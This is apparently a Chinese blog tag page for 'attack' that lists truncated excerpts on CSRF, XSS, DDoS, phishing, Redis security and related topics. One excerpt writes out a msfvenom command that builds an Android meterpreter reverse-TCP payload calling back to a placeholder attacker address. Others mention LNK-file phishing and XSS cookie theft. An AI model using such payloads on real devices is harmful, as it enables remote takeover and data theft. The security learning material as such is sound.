首页 > TAG信息列表 > 攻击

HUAWEI DevEco Testing注入攻击测试:以攻为守,守护OpenHarmony终端安全

OpenAtom OpenHarmony(以下简称“OpenHarmony”)作为面向全场景的开源分布式操作系统,可广泛应用于智能家居物联网终端、智能穿戴、智慧大屏、汽车智能座舱、音箱等智能终端,为用户提供全场景跨设备的极致体验。这些搭载OpenHarmony的智能终端设备(后文简称:OpenHarmony终端)涉及人们生

19.CSRF跨站请求伪造

一.概述 1.定义 Crose-Site Request Forgerry,跨站请求伪造,攻击者利用服务器对用户的信任,从而欺骗受害者去服务器上执行受害者不知情的请求。 在CSRF的攻击场景中,攻击者会伪造一个请求(一般为链接),然后欺骗用户进行点击。用户一旦点击,整个攻击也就完成了。所以 CSRF攻击也被成为“one

CORS、XSS 概念

CORS 介绍 跨域资源共享 Cross-Origin Resource Sharing,CORS 需要浏览器和服务器同时支持。目前,所有浏览器都支持该功能,整个 CORS 通信过程,都是浏览器自动完成,不需要用户参与。对于开发者来说,CORS 通信与同源的 AJAX 通信没有差别,代码完全一样。浏览器一旦发现 AJAX 请求跨源,就会

网络钓鱼活动从虚假应用转向供应链攻击

By Jeffrey - 资深IT经理人,IT运营和安全顾问,历任多家知名跨国企业包括麦肯锡大中华区、通用电气公司、壳牌石油、英美烟草等公司IT总经理         2022 年初,一种被称为“JuiceLedger”的攻击威胁开始进行低调的潜伏,有人开始将“JuiceStealer”放入 Python 程序传播,这是一个设

msf攻击android

msf攻击android[1] 1.msf生成android apk文件 msfvenom -p android/meterpreter/reverse_tcp lhost=<ip地址> lport=<端口> R > test.apk -p android/meterpreter/reverse_top : 表示从android设备返回一个反向连接的meterpreter通道; R:直接输出(虽然android程序用java编写,但是不

网络协议之ICMP

什么是ICMP? 因特网控制报文协议ICMP(Internet Control Message Protocol)是一个差错报告机制,是TCP/IP协议簇中的一个重要子协议,通常被IP层或更高层协议(TCP或UDP)使用,属于网络层协议,主要用于在IP主机和路由器之间传递控制消息,用于报告主机是否可达、路由是否可用等。这些控制消息虽然

钓鱼攻击第一弹-释放文件

钓鱼攻击第一弹-释放文件 之后所有文章发至《熊猫安全》公众号上 获取当前路径 #include <stdio.h> #include "direct.h" #define MAX_SIZE 255 int main(int argc, const char* argv[]) { char buf[MAX_SIZE]; getcwd(buf, sizeof(buf)); printf("current working d

CTF 未分类题目 WriteUp

Misc MASK zip相关考点,掩码攻击,明文攻击等 base32 => base64 => 保存为zip。 解压出hint提示 ZZLT123??? Advanced Archive Password Recovery 掩码攻击, 得到密码 ZZLT123&*% 解压文件 看到zip有desktop.png。手动将desktop.png压缩为zip存储。 明文攻击 pkcrack flag{zip_1s_s

​Black Hat 2022 聚焦软件供应链安全

Black Hat 大会被公认为世界信息安全行业最权威大会,也是在全球范围内最具有技术性的信息安全大会。Black Hat USA 聚焦网络安全事件,并且持续向外界输出前沿安全技术研究成果以及行业发展趋势分析,吸引着全球各地的安全从业者。 软件供应链安全备受关注 软件供应链安全成为 Black Ha

redis安全篇

redis安全 redis被攻击,作为突破口,服务器惨遭毒手的事太常见了。 大多数云服务器被攻击,都是redis,mongodb等数据库被入侵。 因此修改端口,密码,以及注意bind运行地址,是必须。 思考是否要暴露redis到公网。 1..设置密码、端口

PHP 安全漏洞:会话劫持、跨站点脚本、SQL 注入以及如何修复它们

PHP 中的安全性在编写 PHP 代码时,牢记以下安全漏洞非常重要,以避免编写不安全的代码。 漏洞类型这些是您在编写 PHP 代码时会遇到的常见漏洞。我们将在下面更深入地讨论一些。 Cross Site Request Forgery由于程序员没有检查请求从哪里发送而导致的应用程序中的一个漏洞——这种攻

黑客攻击之DDOS

上一期安装了黑客最基本的操作系统,可是光有系统没有作用,还是需要一下技术和工具的。 什么是DDOS 分布式拒绝服务攻击可以使很多的计算机在同一时间遭受到攻击,使攻击的目标无法正常使用,分布式拒绝服务攻击已经出现了很多次,导致很多的大型网站都出现了无法进行操作的情况,这样不仅仅

DOS攻击

dos攻击不同于ddos,dos主要是应用于1v1场景,俗称solo。 ReDos(正则dos) 贪婪匹配和非贪婪匹配 正则引擎:DFA和NFA DFA实例 NFA实例 那么重点来了,我们可以根据正则的规则去指定的payload用burp多线程跑包导致服务器崩溃 由文件解压造成dos 反序列化dos

XSS攻击与react

故事背景 最近在做一个充值的页面,需求方很早之前便提过,需要对页面进行一定的安全保护,恰巧今天项目的小程序方面遭受到了XSS攻击,便想着深入一下前端安全方面。原本想了涉及到金钱交易的报文,已经加密了一层,但这其实也算是前后端的一种安全防范,那对于前端,难道没有任何其他的安全措施

钓鱼攻击之:Lnk 文件钓鱼

钓鱼攻击之:Lnk 文件钓鱼 目录钓鱼攻击之:Lnk 文件钓鱼1 Lnk 钓鱼小试牛刀2 Lnk 图标处理3 进阶利用方式3.1 PDF利用3.2 txt利用,突破Lnk文件目标字符长度限制4 参考资料 1 Lnk 钓鱼小试牛刀 利用技巧: 修改完成后,系统会自动根据所执行的程序更改图标,此时可以通过手动更改指定图标,

test

[NOI2001] 炮兵阵地 题目描述 司令部的将军们打算在 $N\times M$ 的网格地图上部署他们的炮兵部队。 一个 $N\times M$ 的地图由 $N$ 行 $M$ 列组成,地图的每一格可能是山地(用 $\texttt{H}$ 表示),也可能是平原(用 $\texttt{P}$ 表示),如下图。 在每一格平原地形上最多可以布置一支炮兵

Nethunter·键盘攻击

键盘攻击(更新中。。。) NetHunter HID 键盘攻击 DuckHunter HID 攻击 NetHunter BadUSB 攻击 正如官方给的演示图那样,只要编译好脚本,运行,将数据线插入电脑就能进行攻击。 这些都是属于近源渗透 Rucky Nethunter提供的使用工具: 我们也可以使用Rucky 官网 Rucky 是一款外

应急响应

1、什么是应急响应应急响应( Incident Response/ Emergency Response )通常是指一个组织为了应对各种意外事件的发生所做的准备工作以及在突发事件发生时或者发生后所采取的措施。计算机网络应急响应的对象是指计算机或网络所存储、传输、处理的信息的安全事件,事件的主体可能来自

DVWA上low级别反射型,存储型,DOM型XSS攻击获取用户cookie

1.什么是反射型 XSS 攻击? 反射型 XSS 是指应用程序通过 Web 请求获取不可信赖的数据,并在未检验数据是否存在恶意代码的情况下,将其发送给用户。 反射型 XSS 一般可以由攻击者构造带有恶意代码参数的 URL 来实现,在构造的URL 地址被打开后,其中包含的恶意代码参数被浏览器解析和执行。

Web系统常见安全漏洞介绍及解决方案-CSRF攻击

简介 CSRF跨站请求伪造,全称Cross-site request forgery,是指利用受害者尚未失效的身份认证信息(cookie、会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下以受害者的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操作(如转账、改密等)。CSRF是W

ICPC-EC Final游记(?)

疫情年只有final和少数区域赛是现场赛,而我们运气又特别好,没有成为那少数区域赛的paticipants。。。 不过好运的是,去年邀请赛拿的银牌给我们贡献了一发EC的参赛名额,连锁旅游了属于是 因为现在是day -2,先提前祝SakuraFubuki和所有一起旅游的队伍好运~~ 自己的愿望。。。大概是不打铁

双花攻击/51%攻击

今天学习区块链技术,学习到了这么一个概念,证明区块链也不是 无懈可击的,挺有意思。这个也说明,区块越长的链,攻击成本也高,被市场认可的几率越高;反之没什么名气的币,就价值越来越低,甚至跑路。这也算是从技术的角度来出发,证明了投资有风险,炒币需谨慎。

为什么http是不安全的?http会被怎样攻击?

因为http是明文传输的,如果在传输过程中被黑客捕获到,黑客就可以得到消息内容,修改http内容。 因为网络请求会通过很多节点转发,这些节点都能捕获和修改http内容。例如黑客设立了一个免费的wifi,那么连接这个wifi的用户访问http的页面时就可能会被攻击。   使用https可解决http不安全

黑客社会工程学攻击特别危险,你知道多少?

社会工程是一种黑客技术,犯罪分子用来诱骗员工采取行动或提供信息,从而导致威胁参与者渗透到您的组织网络。知名网络安全专家、东方联盟创始人郭盛华表示:“社会工程攻击特别危险,因为黑客可以使用各种策略来未经授权访问您的系统。” 社会工程类型 任何用于从您的员工那里获得权限或

HTTP Host头攻击

什么是HTTP Host头? 从HTTP/1.1开始,HTTP Host头就是强制性的请求标头。比如我们要访问这个URL时 http://www.xxxx.com/web 浏览器会编写个Host标头的请求,"GET"请求的是页面的相对路径,"Host"就是主机头,请求的是域名或服务器地址: GET /web HTTP/1.1 Host:www.xxxx.com   HTTP Host